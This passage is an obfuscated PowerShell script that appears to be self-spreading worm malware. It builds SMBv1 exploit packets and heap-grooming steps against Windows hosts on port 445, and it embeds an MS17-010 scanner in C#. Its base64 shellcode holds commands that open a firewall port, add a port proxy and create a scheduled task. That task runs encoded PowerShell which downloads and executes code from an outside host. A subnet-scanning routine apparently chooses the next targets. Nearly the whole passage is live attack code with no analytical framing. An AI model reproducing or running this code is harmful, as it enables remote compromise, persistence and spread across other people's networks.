$pkt +=0xFF
$pkt +=0x00
$pkt +=0x00,0x00
$pkt +=0x00,0x00
$pkt +=0x01,0x00
$al=[system.Text.Encoding]::ASCII.GetBytes($ipc).Count+8
$pkt+=[bitconverter]::GetBytes($al)[0],0x00
$pkt +=0x00
$pkt += [system.Text.Encoding]::ASCII.GetBytes($ipc)
$pkt += 0x00
$pkt += 0x3f,0x3f,0x3f,0x3f,0x3f,0x00
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_nt_trans_packet8($tree_id, $user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x3C
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0xa0
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x14
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x49,0x01,0x01,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x4c,0x00,0x00,0x00
$pkt += 0x49,0x01,0x00,0x00
$pkt += 0x6c,0x00,0x00,0x00
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x6a,0x01
$pkt += 0xff
$pkt += [Byte[]] (0x00) * 0x1e
$pkt += 0xff,0xff,0x00,0x00,0x01
$pkt += [Byte[]](0x00) * 0x146
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_trans2_exploit_packet8($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 1
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x10,0x38
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x00,0x10
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x00,0x10
$pkt += 0x38,0x00,0x49
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x03,0x10
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function send_big_trans28($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
$nt_trans_pkt = M`A`ke_`sMb1_`Nt_tRaNS_`pA`C`kET8 $smbheader.tree_id $smbheader.user_id
$sock.Send($nt_trans_pkt) | OuT`-`NUll
$raw, $transheader = sMb1`_gET_R`eS`PONsE8($sock)
if (!($transheader.error_class -eq 0x00 -and ($transheader.reserved1 -eq 0x00) -and ($transheader.error_code[0] -eq 0x00) -and ($transheader.error_code[1] -eq 0x00)))
{
return -1,-1
}
$i=$firstDataFragmentSize
$timeout=0
while ($i -lt $data.count)
{
$sendSize=[System.Math]::Min(4096,($data.count-$i))
if (($data.count-$i) -le 4096){
if (!$sendLastChunk)
{ break }
}
$trans2_pkt = m`Ak`E_Smb1_Tr`ANs2_EX`P`Loi`T_PaCKeT8 $smbheader.tree_id $smbheader.user_id $data[$i..($i+$sendSize-1)] $timeout
$sock.Send($trans2_pkt) | oUT`-NU`lL
$timeout+=1
$i +=$sendSize
}
if ($sendLastChunk)
{Smb1_gET_rEsP`ON`s`e8($sock) }
return $i,$timeout
}
function createSessionAllocNonPaged8($target, $size) {
$client = NEW-o`B`JECT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
ClI`eNt`_`NEgOt`IaTe8 $sock $false | Ou`T`-nuLl
$flags2=16385
if ($size -ge 0xffff)
{ $reqsize=$size /2}
else
{
$flags2 =49153
$reqsize= $size
}
$a=[bitconverter]::GetBytes($reqsize)
$b=[bitconverter]::GetBytes($flags2)
$pkt = maK`E_`s`mB1`_frE`E`_Ho`LE_S`ESsi`ON_PAcK`Et8 ($b[0],$b[1]) (0x02,0x00) ($a[0],$a[1],0x00,0x00,0x00)
$sock.Send($pkt) | O`Ut-NULL
SmB`1_`GeT_RE`SpOnS`E8($sock) | Ou`T-`NuLl
return $sock
}
function make_smb1_free_hole_session_packet8($flags2, $vcnum, $native_os) {
[Byte[]] $pkt = 0x00
$pkt += 0x00,0x00,0x51
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += $flags2
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += $vcnum
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x40,0x00,0x00,0x80
$pkt += 0x16,0x00
$pkt += $native_os
$pkt += [Byte[]] (0x00) * 17
return $pkt
}
function make_smb2_payload_headers_packet8($for_nx){
[Byte[]] $pkt = [Byte[]](0x00,0x00,0x81,0x00) + [system.Text.Encoding]::ASCII.GetBytes(('BA'+'AD'))
if ($for_nx){ $pkt+=[Byte[]](0x00)*123 }
else{ $pkt+=[Byte[]](0x00)*124 }
return $pkt
}
function eb8($target,$sc) {
$NTFEA_SIZE8 = 0x9000
$ntfea9000=[byte[]]0x00*0xbe0
$ntfea9000 +=0x00,0x00,0x5c,0x73+[byte[]]0x00*0x735d
$ntfea9000 +=0x00,0x00,0x47,0x81+[byte[]]0x00*0x8148
$TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000
$SHELLCODE_PAGE_ADDR = 0xffffffffffd04000
$PTE_ADDR=0xfffff6ffffffe820
$fakeSrvNetBufferX64Nx =@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xa8,0xe7,0xff,0xff,0xff,0xf6,0xff,0xff)
[byte[]]$feaListNx=[byte[]](0x00,0x00,0x01,0x00)
$feaListNx += $ntfea9000
$feaListNx +=0x00,0x00,0xaf,0x00+ $fakeSrvNetBufferX64Nx
$feaListNx +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x58,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x58,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x41,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x7e,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x41,0xd0,0xff,0xff,0xff,0xff,0xff)
$feaList = cREAtE`FEaL`i`S`T8 $sc.length $ntfea9000
$client = New-`OB`jecT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
cLIENT_n`E`Got`IATE8 $sock $true | Out`-n`ULl
$raw, $smbheader = S`mB1_lOg`In8 $sock
$os=[system.Text.Encoding]::ascii.GetString($raw[45..($raw.count-1)]).ToLower()
if ($os.contains(('wi'+'nd'+'ows 10 ')))
{
$b=[int]$os.split(" ")[-1]
if ($b -ge 14393) {return $False}
}
if (!(($os.contains(('wi'+'ndows '+'8'))) -or ($os.contains(('win'+'dow'+'s')) -and $os.contains(('20'+'12')))))
{return $False}
$sock.ReceiveTimeout =5000
$raw, $smbheader = Tree_CONNE`cT_`AN`dX8 $sock $target $smbheader.user_id
$progress , $timeout= s`END_bI`G_tRAn`S28 $sock $smbheader $feaList ($feaList.length%4096) $False
if (($progress -eq -1) -and ($timeout -eq -1))
{return $false}
$client2 = neW-obJ`e`CT System.Net.Sockets.TcpClient($target,445)
$sock2 = $client2.Client
cL`i`Ent_`NeGotiat`e8 $sock2 $true | O`U`T-NulL
$raw, $smbheader_t = smB1_`L`OGIN8 $sock2
$raw, $smbheader2 = Tr`ee_cO`N`NeCt_AN`DX8 $sock2 $target $smbheader_t.user_id
$progress2 , $timeout2= SEn`D`_big_TrANS`28 $sock2 $smbheader2 $feaListNx ($feaList.length%4096) $False
if (($progress2 -eq -1) -and ($timeout2 -eq -1))
{return $false}
$allocConn = cr`e`A`TESesSIO`N`AllOCN`onpa`GED8 $target ($NTFEA_SIZE8 - 0x2010)
$payload_hdr_pkt = MAK`E_s`Mb`2_`pAYLOaD_Hea`ders`_pAcKe`T8($true)
$groom_socks =@()
for ($i=0; $i -lt 13; $i++)
{
$client = ne`W-Obj`e`ct System.Net.Sockets.TcpClient($target,445)
$client.NoDelay = $true
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | o`Ut`-Null
}
$holeConn = CReaT`e`Ses`SiO`NaLLoCnONPaGed8 $target ($NTFEA_SIZE8 - 0x10)
$allocConn.close()
for ($i=0; $i -lt 5; $i++)
{
$client = N`EW-ObJ`ect System.Net.Sockets.TcpClient($target,445)
$client.NoDelay = $true
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | o`Ut-null
}
$holeConn.close()
$trans2_pkt2 = mAkE_Sm`B1_TRaNS2`_E`X`pLoit_pA`C`ket8 $smbheader2.tree_id $smbheader2.user_id $feaListNx[$progress2..$feaListNx.count] $timeout2
$sock2.Send($trans2_pkt2) | ouT-n`U`ll
$raw2, $transheader2 = sMB1_`geT`_RE`sP`o`NSE8($sock2)
if ($raw2 -eq -1 -and ($transheader2 -eq -1)){return $false}
foreach ($sk in $groom_socks)
{
$sk.Send([byte[]]0x00) | Ou`T-Null
}
$trans2_pkt =MAKE_Sm`B1_TRa`N`S2_eXP`Lo`I`T_`Pa`CKE`T8 $smbheader.tree_id $smbheader.user_id $feaList[$progress..$feaList.count] $timeout
$sock.Send($trans2_pkt) | o`UT`-NuLL
$raw, $transheader = smB`1_GET`_Re`spo`NSE8($sock)
if ($raw -eq -1 -and ($transheader -eq -1)){return $false}
foreach ($sk in $groom_socks)
{
$sk.Send($fake_recv_struct + $sc) | oU`T`-NUll
}
foreach ($sk in $groom_socks)
{
$sk.close() | oU`T-`NulL
}
$sock.Close()| Out-`N`ULL
return $true
}
$Source = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace PingCastle.Scanners
{
public class m17sc
{
static public bool Scan(string computer)
{
TcpClient client = new TcpClient();
client.Connect(computer, 445);
try
{
NetworkStream stream = client.GetStream();
byte[] negotiatemessage = GetNegotiateMessage();
stream.Write(negotiatemessage, 0, negotiatemessage.Length);
stream.Flush();
byte[] response = ReadSmbResponse(stream);
if (!(response[8] == 0x72 && response[9] == 00))
{
throw new InvalidOperationException("invalid negotiate response");
}
byte[] sessionSetup = GetR(response);
stream.Write(sessionSetup, 0, sessionSetup.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x73 && response[9] == 00))
{
throw new InvalidOperationException("invalid sessionSetup response");
}
byte[] treeconnect = GetTreeConnectAndXRequest(response, computer);
stream.Write(treeconnect, 0, treeconnect.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x75 && response[9] == 00))
{
throw new InvalidOperationException("invalid TreeConnect response");
}
byte[] peeknamedpipe = GetPeekNamedPipe(response);
stream.Write(peeknamedpipe, 0, peeknamedpipe.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (response[8] == 0x25 && response[9] == 0x05 && response[10] ==0x02 && response[11] ==0x00 && response[12] ==0xc0 )
{
return true;
}
}
catch (Exception)
{
throw;
}
return false;
}
private static byte[] ReadSmbResponse(NetworkStream stream)
{
byte[] temp = new byte[4];
stream.Read(temp, 0, 4);
int size = temp[3] + temp[2] * 0x100 + temp[3] * 0x10000;
byte[] output = new byte[size + 4];
stream.Read(output, 4, size);
Array.Copy(temp, output, 4);
return output;
}
static byte[] GetNegotiateMessage()
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x72,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x44,0x6d,
0x00,0x00,
0x42,0xc1,
0x00,
0x31,0x00,
0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,
0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x00,
0x02,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x00,
0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,
};
return EncodeNetBiosLength(output);
}
static byte[] GetR(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x73,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x0d,
0xff,
0x00,
0x00,0x00,
0xdf,0xff,
0x02,0x00,
0x01,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x00,0x00,0x00,0x00,
0x40,0x00,0x00,0x00,
0x26,0x00,
0x00,
0x2e,0x00,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x32,0x31,0x39,0x35,0x00,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x35,0x2e,0x30,0x00
};
return EncodeNetBiosLength(output);
}
private static byte[] EncodeNetBiosLength(byte[] input)
{
byte[] len = BitConverter.GetBytes(input.Length-4);
input[3] = len[0];
input[2] = len[1];
input[1] = len[2];
return input;
}
static byte[] GetTreeConnectAndXRequest(byte[] data, string computer)
{
MemoryStream ms = new MemoryStream();
BinaryReader reader = new BinaryReader(ms);
byte[] part1 = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x75,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x04,
0xff,
0x00,
0x00,0x00,
0x00,0x00,
0x01,0x00,
0x19,0x00,
0x00,
0x5c,0x5c};
byte[] part2 = new byte[] {
0x5c,0x49,0x50,0x43,0x24,0x00,
0x3f,0x3f,0x3f,0x3f,0x3f,0x00
};
ms.Write(part1, 0, part1.Length);
byte[] encodedcomputer = new ASCIIEncoding().GetBytes(computer);
ms.Write(encodedcomputer, 0, encodedcomputer.Length);
ms.Write(part2, 0, part2.Length);
ms.Seek(0, SeekOrigin.Begin);
byte[] output = reader.ReadBytes((int) reader.BaseStream.Length);
return EncodeNetBiosLength(output);
}
static byte[] GetPeekNamedPipe(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00,
0xff,0x53,0x4d,0x42,
0x25,
0x00,
0x00,
0x00,0x00,
0x18,
0x01,0x28,
0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1,
0x10,
0x00,0x00,
0x00,0x00,
0xff,0xff,
0xff,0xff,
0x00,
0x00,
0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,
0x00,0x00,
0x4a,0x00,
0x00,0x00,
0x4a,0x00,
0x02,
0x00,
0x23,0x00,
0x00,0x00,
0x07,0x00,
0x5c,0x50,0x49,0x50,0x45,0x5c,0x00
};
return EncodeNetBiosLength(output);
}
}
}
"@
aD`d-TY`pe -TypeDefinition $Source
$sc=[Convert]::FromBase64String("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")
function localscan {
Param(
[int]$Port = 445
)
$allip = @()
[string[]]$ipsub = @()
[string[]]$ipaddr = @()
$regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
$regex.Matches((ipconfig /all)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
$regex.Matches((ipconfig /displaydns)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
$regex.Matches((netstat -ano)) | ForEach-Object {
if ($allip -notcontains $_.Value)
{ $allip += $_.Value }
}
foreach($IP in $allip)
{
if ($IP.StartsWith("127.") -or ($IP -match '25\d.*') -or ($IP -match '24\d.*') -or $IP.StartsWith("0.") -or $IP.StartsWith("169.254"))
{
}else{
$iptemp = $ip.Split(".")
$SubnetIP = $iptemp[0] + "." + $iptemp[1] + "." + $iptemp[2]
if ($ipsub -notcontains $SubnetIP)
{ $ipsub += $SubnetIP }
}
}
if($ipsub -notcontains '192.168.0')
{ $ipsub += '192.168.0' }
if($ipsub -notcontains '192.168.1')
{ $ipsub += '192.168.1' }
if($ipsub -notcontains '192.168.2')
{ $ipsub += '192.168.2' }
if($ipsub -notcontains '192.168.8')
{ $ipsub += '192.168.8' }
if($ipsub -notcontains '10.0.0')
{ $ipsub += '10.0.0' }
try{
$NetObject = New-Object Net.WebClient
$wlanip = $NetObject.DownloadString("https://api.ipify.org/")
$wlaniptemp = $wlanip.Split(".")
$wlansub = $wlaniptemp[0] + "." + $wlaniptemp[1] + "." + $wlaniptemp[2]
if($ipsub -notcontains $wlansub)
{ $ipsub += $wlansub }
}catch{}
try{
$ipaddress = [System.Net.DNS]::GetHostByName($null).AddressList
$localip = @()
Foreach ($ip in $ipaddress)
{
$localip += $ip.IPAddressToString
$intiptemp = $ip.IPAddressToString.Split(".")
if($intiptemp[0] -ne '127'){
